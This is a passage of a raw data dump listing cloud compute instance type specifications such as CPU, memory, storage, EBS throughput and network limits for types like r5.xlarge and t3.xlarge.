{'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 31232, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 80, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 31232}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 80, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 31232, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 31232}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 